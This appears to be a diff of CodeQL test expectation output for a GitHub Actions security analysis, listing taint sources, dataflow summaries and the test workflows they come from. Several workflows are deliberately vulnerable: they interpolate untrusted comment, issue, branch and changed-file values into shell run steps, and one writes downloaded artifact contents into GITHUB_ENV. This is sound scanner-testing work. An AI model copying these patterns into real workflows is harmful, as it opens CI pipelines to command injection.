| +| .github/workflows/multiline.yml:20:14:23:40 | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | +| .github/workflows/multiline.yml:24:9:30:6 | Run Step | +| .github/workflows/multiline.yml:24:14:29:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/multiline.yml:30:9:33:14 | Run Step | +| .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | +| .github/workflows/multiline.yml:32:13:32:39 | toJson(github.event) | +| .github/workflows/test.yml:1:1:40:53 | enter on: push | +| .github/workflows/test.yml:1:1:40:53 | exit on: push | +| .github/workflows/test.yml:1:1:40:53 | exit on: push (normal) | +| .github/workflows/test.yml:1:1:40:53 | on: push | +| .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:8:7:10:4 | Job outputs node | +| .github/workflows/test.yml:8:20:8:50 | steps.step.outputs.value | +| .github/workflows/test.yml:11:9:15:6 | Uses Step | +| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | +| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +| .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | +| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | +| .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | +| .github/workflows/test.yml:27:20:27:64 | steps.source.outputs.all_changed_files | +| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | +| .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | +| .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | +| .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | +| .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | +| .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | 
+dfNodes +| .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | +| .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | +| .github/workflows/expression_nodes.yml:7:27:7:58 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | +| .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | +| .github/workflows/expression_nodes.yml:9:25:9:56 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | +| .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | +| .github/workflows/expression_nodes.yml:11:25:11:56 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:12:24:12:51 | github.event.issue.body | +| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | +| .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | +| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.issue.body | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | +| .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | +| .github/workflows/expression_nodes.yml:17:25:17:56 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:18:24:18:51 | github.event.issue.body | +| .github/workflows/expression_nodes.yml:19:24:19:55 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | +| .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ 
github.event.comment.body }}' echo '${{github.event.issue.body}}' | +| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | +| .github/workflows/multiline.yml:9:5:33:14 | Job: Test | +| .github/workflows/multiline.yml:11:9:15:6 | Run Step | +| .github/workflows/multiline.yml:11:14:14:48 | echo "changelog<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | +| .github/workflows/multiline.yml:15:9:20:6 | Run Step | +| .github/workflows/multiline.yml:15:14:19:40 | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | +| .github/workflows/multiline.yml:20:9:24:6 | Run Step | +| .github/workflows/multiline.yml:20:14:23:40 | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | +| .github/workflows/multiline.yml:24:9:30:6 | Run Step | +| .github/workflows/multiline.yml:24:14:29:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/multiline.yml:30:9:33:14 | Run Step | +| .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | +| .github/workflows/multiline.yml:32:13:32:39 | toJson(github.event) | +| .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:8:7:10:4 | Job outputs node | +| .github/workflows/test.yml:8:20:8:50 | steps.step.outputs.value | +| .github/workflows/test.yml:11:9:15:6 | Uses Step | +| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | +| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +| .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | +| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | +| .github/workflows/test.yml:27:14:27:63 | echo ${{ 
steps.source.outputs.all_changed_files }} | +| .github/workflows/test.yml:27:20:27:64 | steps.source.outputs.all_changed_files | +| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | +| .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | +| .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | +| .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | +| .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | +| .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | +argumentNodes +| .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | +usesIds +| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | source | +| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | step | +nodeLocations +| .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | .github/workflows/expression_nodes.yml:5:5:21:47 | .github/workflows/expression_nodes.yml@5:5:21:47 | +| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | .github/workflows/expression_nodes.yml:7:9:8:6 | .github/workflows/expression_nodes.yml@7:9:8:6 | +| .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | .github/workflows/expression_nodes.yml:7:14:7:58 | .github/workflows/expression_nodes.yml@7:14:7:58 | +| .github/workflows/expression_nodes.yml:7:27:7:58 | github.event.comment.body | .github/workflows/expression_nodes.yml:7:27:7:58 | .github/workflows/expression_nodes.yml@7:27:7:58 | +| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | .github/workflows/expression_nodes.yml:8:9:10:6 | .github/workflows/expression_nodes.yml@8:9:10:6 | +| .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:8:14:9:57 | .github/workflows/expression_nodes.yml@8:14:9:57 | 
+| .github/workflows/expression_nodes.yml:9:25:9:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:9:25:9:56 | .github/workflows/expression_nodes.yml@9:25:9:56 | +| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | .github/workflows/expression_nodes.yml:10:9:13:6 | .github/workflows/expression_nodes.yml@10:9:13:6 | +| .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:10:14:12:53 | .github/workflows/expression_nodes.yml@10:14:12:53 | +| .github/workflows/expression_nodes.yml:11:25:11:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:11:25:11:56 | .github/workflows/expression_nodes.yml@11:25:11:56 | +| .github/workflows/expression_nodes.yml:12:24:12:51 | github.event.issue.body | .github/workflows/expression_nodes.yml:12:24:12:51 | .github/workflows/expression_nodes.yml@12:24:12:51 | +| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | .github/workflows/expression_nodes.yml:13:9:16:6 | .github/workflows/expression_nodes.yml@13:9:16:6 | +| .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:13:14:15:46 | .github/workflows/expression_nodes.yml@13:14:15:46 | +| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.comment.body | .github/workflows/expression_nodes.yml:14:9:15:46 | .github/workflows/expression_nodes.yml@14:9:15:46 | +| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.issue.body | .github/workflows/expression_nodes.yml:14:9:15:46 | .github/workflows/expression_nodes.yml@14:9:15:46 | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:16:9:20:6 | .github/workflows/expression_nodes.yml@16:9:20:6 | +| .github/workflows/expression_nodes.yml:16:14:19:57 | 
LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:16:14:19:57 | .github/workflows/expression_nodes.yml@16:14:19:57 | +| .github/workflows/expression_nodes.yml:17:25:17:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:17:25:17:56 | .github/workflows/expression_nodes.yml@17:25:17:56 | +| .github/workflows/expression_nodes.yml:18:24:18:51 | github.event.issue.body | .github/workflows/expression_nodes.yml:18:24:18:51 | .github/workflows/expression_nodes.yml@18:24:18:51 | +| .github/workflows/expression_nodes.yml:19:24:19:55 | github.event.comment.body | .github/workflows/expression_nodes.yml:19:24:19:55 | .github/workflows/expression_nodes.yml@19:24:19:55 | +| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:20:9:21:47 | .github/workflows/expression_nodes.yml@20:9:21:47 | +| .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | .github/workflows/expression_nodes.yml:20:14:21:46 | .github/workflows/expression_nodes.yml@20:14:21:46 | +| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | .github/workflows/expression_nodes.yml:20:14:21:46 | .github/workflows/expression_nodes.yml@20:14:21:46 | +| .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | .github/workflows/expression_nodes.yml:20:14:21:46 | .github/workflows/expression_nodes.yml@20:14:21:46 | +| .github/workflows/multiline.yml:9:5:33:14 | Job: Test | .github/workflows/multiline.yml:9:5:33:14 | .github/workflows/multiline.yml@9:5:33:14 | +| .github/workflows/multiline.yml:11:9:15:6 | Run Step | .github/workflows/multiline.yml:11:9:15:6 | .github/workflows/multiline.yml@11:9:15:6 | +| .github/workflows/multiline.yml:11:14:14:48 | echo "changelog<> $GITHUB_OUTPUT\necho -e 
"$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:11:14:14:48 | .github/workflows/multiline.yml@11:14:14:48 | +| .github/workflows/multiline.yml:15:9:20:6 | Run Step | .github/workflows/multiline.yml:15:9:20:6 | .github/workflows/multiline.yml@15:9:20:6 | +| .github/workflows/multiline.yml:15:14:19:40 | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:15:14:19:40 | .github/workflows/multiline.yml@15:14:19:40 | +| .github/workflows/multiline.yml:20:9:24:6 | Run Step | .github/workflows/multiline.yml:20:9:24:6 | .github/workflows/multiline.yml@20:9:24:6 | +| .github/workflows/multiline.yml:20:14:23:40 | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | .github/workflows/multiline.yml:20:14:23:40 | .github/workflows/multiline.yml@20:14:23:40 | +| .github/workflows/multiline.yml:24:9:30:6 | Run Step | .github/workflows/multiline.yml:24:9:30:6 | .github/workflows/multiline.yml@24:9:30:6 | +| .github/workflows/multiline.yml:24:14:29:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:24:14:29:29 | .github/workflows/multiline.yml@24:14:29:29 | +| .github/workflows/multiline.yml:30:9:33:14 | Run Step | .github/workflows/multiline.yml:30:9:33:14 | .github/workflows/multiline.yml@30:9:33:14 | +| .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | .github/workflows/multiline.yml:30:14:33:14 | .github/workflows/multiline.yml@30:14:33:14 | +| .github/workflows/multiline.yml:32:13:32:39 | toJson(github.event) | .github/workflows/multiline.yml:32:13:32:39 | .github/workflows/multiline.yml@32:13:32:39 | +| .github/workflows/test.yml:5:5:31:2 | Job: job1 | .github/workflows/test.yml:5:5:31:2 | 
.github/workflows/test.yml@5:5:31:2 | +| .github/workflows/test.yml:8:7:10:4 | Job outputs node | .github/workflows/test.yml:8:7:10:4 | .github/workflows/test.yml@8:7:10:4 | +| .github/workflows/test.yml:8:20:8:50 | steps.step.outputs.value | .github/workflows/test.yml:8:20:8:50 | .github/workflows/test.yml@8:20:8:50 | +| .github/workflows/test.yml:11:9:15:6 | Uses Step | .github/workflows/test.yml:11:9:15:6 | .github/workflows/test.yml@11:9:15:6 | +| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | .github/workflows/test.yml:15:9:19:6 | .github/workflows/test.yml@15:9:19:6 | +| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | .github/workflows/test.yml:19:9:26:6 | .github/workflows/test.yml@19:9:26:6 | +| .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | .github/workflows/test.yml:23:20:23:64 | .github/workflows/test.yml@23:20:23:64 | +| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:26:9:28:6 | .github/workflows/test.yml@26:9:28:6 | +| .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | .github/workflows/test.yml:27:14:27:63 | .github/workflows/test.yml@27:14:27:63 | +| .github/workflows/test.yml:27:20:27:64 | steps.source.outputs.all_changed_files | .github/workflows/test.yml:27:20:27:64 | .github/workflows/test.yml@27:20:27:64 | +| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:28:9:31:2 | .github/workflows/test.yml@28:9:31:2 | +| .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | .github/workflows/test.yml:29:14:29:54 | .github/workflows/test.yml@29:14:29:54 | +| .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | .github/workflows/test.yml:29:15:29:55 | .github/workflows/test.yml@29:15:29:55 | +| .github/workflows/test.yml:32:5:40:53 | Job: job2 | .github/workflows/test.yml:32:5:40:53 | .github/workflows/test.yml@32:5:40:53 | 
+| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:39:9:40:53 | .github/workflows/test.yml@39:9:40:53 | +| .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | .github/workflows/test.yml:40:14:40:52 | .github/workflows/test.yml@40:14:40:52 | +| .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | .github/workflows/test.yml:40:20:40:53 | .github/workflows/test.yml@40:20:40:53 | +scopes +| .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/multiline.yml:1:1:33:14 | on: | +| .github/workflows/test.yml:1:1:40:53 | on: push | +sources +| ahmadnassri/action-changed-files | * | output.files | PR changed files | manual | +| ahmadnassri/action-changed-files | * | output.json | PR changed files | manual | +| amannn/action-semantic-pull-request | * | output.error_message | PR title | manual | +| cypress-io/github-action | * | env.GH_BRANCH | PR branch | manual | +| dawidd6/action-download-artifact | * | output.artifacts | Artifact details | manual | +| dorny/paths-filter | * | output.changes | PR changed files | manual | +| franzdiebold/github-env-vars-action | * | output.CI_PR_DESCRIPTION | PR body | manual | +| franzdiebold/github-env-vars-action | * | output.CI_PR_TITLE | PR title | manual | +| googlecloudplatform/magic-modules | * | output.changed-files | PR changed files | manual | +| jitterbit/get-changed-files | * | output.added | PR changed files | manual | +| jitterbit/get-changed-files | * | output.added_modified | PR changed files | manual | +| jitterbit/get-changed-files | * | output.all | PR changed files | manual | +| jitterbit/get-changed-files | * | output.deleted | PR changed files | manual | +| jitterbit/get-changed-files | * | output.modified | PR changed files | manual | +| jitterbit/get-changed-files | * | output.removed | PR changed files | manual | +| jitterbit/get-changed-files | * | output.renamed | PR changed files | manual | 
+| khan/pull-request-comment-trigger | * | output.comment_body | Comment body | manual | +| marocchino/on_artifact | * | output.* | Downloaded artifact | manual | +| puppeteer/puppeteer/.github/workflows/changed-packages.yml | * | output.changes | Changed files | manual | +| redhat-plumbers-in-action/download-artifact | * | output.* | Downloaded artifact | manual | +| tj-actions/branch-names | * | output.current_branch | PR current branch | manual | +| tj-actions/branch-names | * | output.head_ref_branch | PR head branch | manual | +| tj-actions/branch-names | * | output.ref_branch | Branch tirggering workflow run | manual | +| tj-actions/changed-files | * | output.added_files | PR changed files | manual | +| tj-actions/changed-files | * | output.all_changed_and_modified_files | PR changed files | manual | +| tj-actions/changed-files | * | output.all_changed_files | PR changed files | manual | +| tj-actions/changed-files | * | output.all_modified_files | PR changed files | manual | +| tj-actions/changed-files | * | output.all_old_new_renamed_files | PR changed files | manual | +| tj-actions/changed-files | * | output.changed_keys | PR changed files | manual | +| tj-actions/changed-files | * | output.copied_files | PR changed files | manual | +| tj-actions/changed-files | * | output.deleted_files | PR changed files | manual | +| tj-actions/changed-files | * | output.modified_files | PR changed files | manual | +| tj-actions/changed-files | * | output.modified_keys | PR changed files | manual | +| tj-actions/changed-files | * | output.other_changed_files | PR changed files | manual | +| tj-actions/changed-files | * | output.other_deleted_files | PR changed files | manual | +| tj-actions/changed-files | * | output.other_modified_files | PR changed files | manual | +| tj-actions/changed-files | * | output.renamed_files | PR changed files | manual | +| tj-actions/changed-files | * | output.type_changed_files | PR changed files | manual | +| tj-actions/changed-files | * 
| output.unknown_files | PR changed files | manual | +| tj-actions/changed-files | * | output.unmerged_files | PR changed files | manual | +| tj-actions/verify-changed-files | * | output.changed-files | PR changed files | manual | +| trilom/file-changes-action | * | output.files | PR changed files | manual | +| trilom/file-changes-action | * | output.files_added | PR changed files | manual | +| trilom/file-changes-action | * | output.files_modified | PR changed files | manual | +| trilom/file-changes-action | * | output.files_removed | PR changed files | manual | +| tzkhan/pr-update-action | * | output.headMatch | | manual | +| xt0rted/slash-command-action | * | output.command-arguments | | manual | +summaries +| akhileshns/heroku-deploy | * | input.branch | output.status | taint | manual | +| android-actions/setup-android | * | input.cmdline-tools-version | output.ANDROID_COMMANDLINE_TOOLS_VERSION | taint | manual | +| apache/incubator-kie-tools | * | input.pnpm_filter_string | output.pnpm_filter_string | taint | manual | +| apple-actions/import-codesign-certs | * | input.keychain-password | output.keychain-password | taint | manual | +| ashley-taylor/read-json-property-action | * | input.json | output.value | taint | manual | +| ashley-taylor/regex-property-action | * | input.replacement | output.value | taint | manual | +| ashley-taylor/regex-property-action | * | input.value | output.value | taint | manual | +| aszc/change-string-case-action | * | input.replace-with | output.lowercase | taint | manual | +| aszc/change-string-case-action | * | input.replace-with | output.uppercase | taint | manual | +| aszc/change-string-case-action | * | input.string | output.capitalized | taint | manual | +| aws-actions/configure-aws-credentials | * | input.aws-access-key-id | env.AWS_ACCESS_KEY_ID | taint | manual | +| aws-actions/configure-aws-credentials | * | input.aws-access-key-id | secret.AWS_ACCESS_KEY_ID | taint | manual | +| aws-actions/configure-aws-credentials | * 
| input.aws-secret-access-key | env.AWS_SECRET_ACCESS_KEY | taint | manual | +| aws-actions/configure-aws-credentials | * | input.aws-secret-access-key | secret.AWS_SECRET_ACCESS_KEY | taint | manual | +| aws-actions/configure-aws-credentials | * | input.aws-session-token | env.AWS_SESSION_TOKEN | taint | manual | +| aws-actions/configure-aws-credentials | * | input.aws-session-token | secret.AWS_SESSION_TOKEN | taint | manual | +| aws-powertools/powertools-lambda-python | * | input.artifact_name_prefix | output.artifact_name | taint | manual | +| bobheadxi/deployments | * | input.env | output.env | taint | manual | +| bufbuild/buf-breaking-action | * | input.buf_token | env.BUF_TOKEN | taint | manual | +| bufbuild/buf-lint-action | * | input.buf_token | env.BUF_TOKEN | taint | manual | +| cachix/cachix-action | * | input.signingKey | env.CACHIX_SIGNING_KEY | taint | manual | +| cloudposse/github-action-matrix-outputs-write/.github/workflows/setup-test.yml | * | input.matrix-key | output.result | taint | manual | +| coursier/cache-action | * | input.path | env.COURSIER_CACHE | taint | manual | +| crazy-max/ghaction-import-gpg | * | input.fingerprint | output.fingerprint | taint | manual | +| csexton/release-asset-action | * | input.release-url | output.url | taint | manual | +| delaguardo/setup-clojure | * | input.boot | env.BOOT_VERSION | taint | manual | +| drawpile/drawpile | * | input.cache_key | output.cache_key | taint | manual | +| drawpile/drawpile | * | input.path | output.path | taint | manual | +| element-hq/element-desktop/.github/workflows/build_prepare.yaml | * | input.deploy | output.deploy | taint | manual | +| envoyproxy/envoy/.github/workflows/_load.yml | * | input.check-name | output.check-name | taint | manual | +| envoyproxy/envoy/.github/workflows/_load.yml | * | input.run-id | output.run-id | taint | manual | +| flagsmith/flagsmith | * | input.aws_ecr_repository_arn | output.image | taint | manual | +| frabert/replace-string-action | * | 
input.replace-with | output.replaced | taint | manual | +| frabert/replace-string-action | * | input.string | output.replaced | taint | manual | +| game-ci/unity-test-runner | * | input.artifactsPath | output.artifactsPath | taint | manual | +| getsentry/action-release | * | input.version | output.version | taint | manual | +| getsentry/action-release | * | input.version_prefix | output.version | taint | manual | +| github/codeql-action | * | input.output | output.sarif-output | taint | manual | +| gradle/gradle-build-action | * | input.build-scan-terms-of-service-agree | env.BUILD_SCAN_TERMS_OF_SERVICE_AGREE | taint | manual | +| gradle/gradle-build-action | * | input.build-scan-terms-of-service-url | env.BUILD_SCAN_TERMS_OF_SERVICE_URL | taint | manual | +| gradle/gradle-build-action | * | input.cache-encryption-key | env.GRADLE_ENCRYPTION_KEY | taint | manual | +| hashgraph/hedera-services/.github/workflows/zxc-publish-production-image.yaml | * | input.version | output.docker-image | taint | manual | +| hashgraph/hedera-services/.github/workflows/zxc-publish-production-image.yaml | * | input.version | output.docker-image-tag | taint | manual | +| hashicorp/vault | * | input.vault-binary-path | output.vault-binary-path | taint | manual | +| hashicorp/vault | * | input.vault-version | output.vault-version | taint | manual | +| hashicorp/vault/.github/workflows/build-artifacts-ce.yml | * | input.vault-revision | output.testable-containers | taint | manual | +| hashicorp/vault/.github/workflows/build-artifacts-ce.yml | * | input.vault-version-package | output.testable-packages | taint | manual | +| haya14busa/action-cond | * | input.if_false | output.value | taint | manual | +| haya14busa/action-cond | * | input.if_true | output.value | taint | manual | +| hexlet/project-action | * | input.mount-path | env.PWD | taint | manual | +| hitobito/hitobito/.github/workflows/stage-settings.yml | * | input.repository | output.project | taint | manual | +| 
hitobito/hitobito/.github/workflows/stage-settings.yml | * | input.repository | output.repo_name | taint | manual | +| hitobito/hitobito/.github/workflows/stage-settings.yml | * | input.repository | output.repo_url | taint | manual | +| hitobito/hitobito/.github/workflows/stage-settings.yml | * | input.stage | output.release_stage | taint | manual | +| jhipster/generator-jhipster | * | input.skip-workflow | output.skip-workflow | taint | manual | +| jsdaniell/create-json | * | input.dir | output.successfully | taint | manual | +| jsdaniell/create-json | * | input.json | output.successfully | taint | manual | +| jsdaniell/create-json | * | input.name | output.successfully | taint | manual | +| jwalton/gh-ecr-push | * | input.image | output.imageUrl | taint | manual | +| kubeshop/botkube/.github/workflows/process-chart.yml | * | input.next-version | output.new-version | taint | manual | +| larsoner/circleci-artifacts-redirector-action | * | input.artifact-path | output.url | taint | manual | +| linkerd/linkerd2 | * | input.component | output.image | taint | manual | +| linkerd/linkerd2 | * | input.docker-registry | output.image | taint | manual | +| linkerd/linkerd2 | * | input.tag | output.image | taint | manual | +| mad9000/actions-find-and-replace-string | * | input.replace | output.value | taint | manual | +| mad9000/actions-find-and-replace-string | * | input.source | output.value | taint | manual | +| mattdavis0351/actions | * | input.image-name | output.imageUrl | taint | manual | +| mattdavis0351/actions | * | input.tag | output.imageUrl | taint | manual | +| metro-digital/setup-tools-for-waas | * | input.gcp_sa_key | env.GCLOUD_PROJECT | taint | manual | +| mishakav/pytest-coverage-comment | * | input.multiple-files | output.summaryReport | taint | manual | +| mymindstorm/setup-emsdk | * | input.actions-cache-folder | env.EMSDK | taint | manual | +| neondatabase/neon/.github/workflows/build-build-tools-image.yml | * | input.image-tag | output.image | taint | 
manual | +| neondatabase/neon/.github/workflows/build-build-tools-image.yml | * | input.image-tag | output.image-tag | taint | manual | +| novuhq/novu | * | input.docker_name | output.image | taint | manual | +| philosowaffle/peloton-to-garmin | * | input.os | output.artifact_name | taint | manual | +| ruby/setup-ruby | * | input.ruby-version | output.ruby-prefix | taint | manual | +| salsify/action-detect-and-tag-new-version | * | input.tag-template | output.tag | taint | manual | +| shallwefootball/upload-s3-action | * | input.destination_dir | output.object_key | taint | manual | +| shogo82148/actions-setup-perl | * | input.working-directory | env.PERL5LIB | taint | manual | +| streetsidesoftware/cspell | * | input.value | output.value | taint | manual | +| streetsidesoftware/cspell/.github/workflows/reuseable-load-integrations-repo-list.yml | * | input.ref | output.ref | taint | manual | +| suisei-cn/actions-download-file | * | input.filename | output.filename | taint | manual | +| tencent/hippy/.github/workflows/reuse_approve_checks_run.yml | * | input.pull_request_head_sha | output.pull_request_head_sha | taint | manual | +| tencent/hippy/.github/workflows/reuse_approve_checks_run.yml | * | input.pull_request_number | output.pull_request_number | taint | manual | +| timheuer/base64-to-file | * | input.fileDir | output.filePath | taint | manual | +| timheuer/base64-to-file | * | input.fileName | output.filePath | taint | manual | +| zitadel/zitadel/.github/workflows/container.yml | * | input.build_image_name | output.build_image | taint | manual | +calls +| .github/workflows/test.yml:11:9:15:6 | Uses Step | actions/checkout | +| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | tj-actions/changed-files | +| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | mad9000/actions-find-and-replace-string | +needs +| .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | +testNormalizeExpr +| foo['bar'] == baz | foo.bar == baz | +| 
github.event.pull_request.user["login"] | github.event.pull_request.user.login | +| github.event.pull_request.user['login'] | github.event.pull_request.user.login | +| github.event.pull_request['user']['login'] | github.event.pull_request.user.login | +writeToGitHubEnv +| id1 | $( { - return artifact.name == "oc-code-coverage" - })[0]; - let download = await github.rest.actions.downloadArtifact({ - owner: context.repo.owner, - repo: context.repo.repo, - artifact_id: matchArtifact.id, - archive_format: 'zip', - }); - let fs = require('fs'); - fs.writeFileSync(`${process.env.GITHUB_WORKSPACE}/oc-code-coverage.zip`, Buffer.from(download.data)); - - name: 'Unzip code coverage' - run: unzip oc-code-coverage.zip -d coverage - - name: set env vars - run: | - echo "SONAR_PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV - echo "SONAR_BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV - echo "SONAR_HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV - # on develop branch, only run a baseline scan - - name: SonarCloud Scan (Baseline) - uses: sonarsource/sonarcloud-github-action@master - if: env.SONAR_HEAD == 'develop' - env: - GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} - SONAR_TOKEN: ${{ secrets.SONAR_TOKEN }} - with: - args: > - -Dsonar.scm.revision=${{ github.event.workflow_run.head_sha }} - -Dsonar.projectKey=opencost_opencost - -Dsonar.organization=opencost - -Dsonar.branch.name=develop - -Dsonar.branch.target=develop - - uses: actions/github-script@v6 - with: - script: | - print("${{enb.SONAR_PR_NUM}}") - - name: SonarCloud Scan (PR) - uses: sonarsource/sonarcloud-github-action@master - if: env.SONAR_HEAD != 'develop' - env: - GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} - SONAR_TOKEN: ${{ secrets.SONAR_TOKEN }} - with: - args: > - -Dsonar.scm.revision=${{ github.event.workflow_run.head_sha }} - -Dsonar.pullrequest.key=${{ env.SONAR_PR_NUM }} - -Dsonar.pullrequest.branch=${{ env.SONAR_HEAD }} - -Dsonar.pullrequest.base=${{ env.SONAR_BASE }} - -Dsonar.projectKey=opencost_opencost - 
